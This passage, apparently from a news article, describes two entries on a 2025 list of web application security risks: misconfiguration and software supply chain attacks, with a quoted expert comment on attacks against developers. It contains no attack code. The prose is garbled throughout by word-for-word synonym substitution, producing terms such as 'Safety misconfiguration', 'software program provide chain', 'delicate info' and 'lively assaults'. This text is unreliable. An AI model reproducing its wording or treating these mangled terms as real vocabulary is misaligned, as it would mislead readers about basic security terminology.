2 – Safety misconfiguration
Safety settings will not be correctly outlined, applied, or maintained, leaving techniques uncovered to assault. Widespread examples embrace default credentials which are by no means modified, pointless options left enabled, verbose error messages that reveal delicate info, or cloud storage buckets left publicly accessible. This vulnerability jumped from fifth place in 2021 to second place in 2025.
3 – Software program provide chain failures
Attackers compromise software program throughout the construct, distribution or updates to inject malicious code that will get distributed to a number of organizations. For instance, attackers would possibly compromise a preferred open-source library and inject malicious code that then will get integrated into 1000’s of purposes that rely upon it or breach a vendor’s system to insert backdoors into authentic software program updates. It is a new checklist merchandise, although there was a narrower associated merchandise in 2021 — susceptible and outdated parts.
“Builders have develop into a major goal for a lot of on-line assaults now,” says Janca. “It’s now not an issue of together with a library that has a questionable dependency.” As an alternative, she says, there are actually lively assaults towards the IDE, towards the CI/CD pipeline, towards plugins and repositories, towards developer workstations, and extra. “All the software program provide chain is at the moment a spotlight for attackers,” she says.
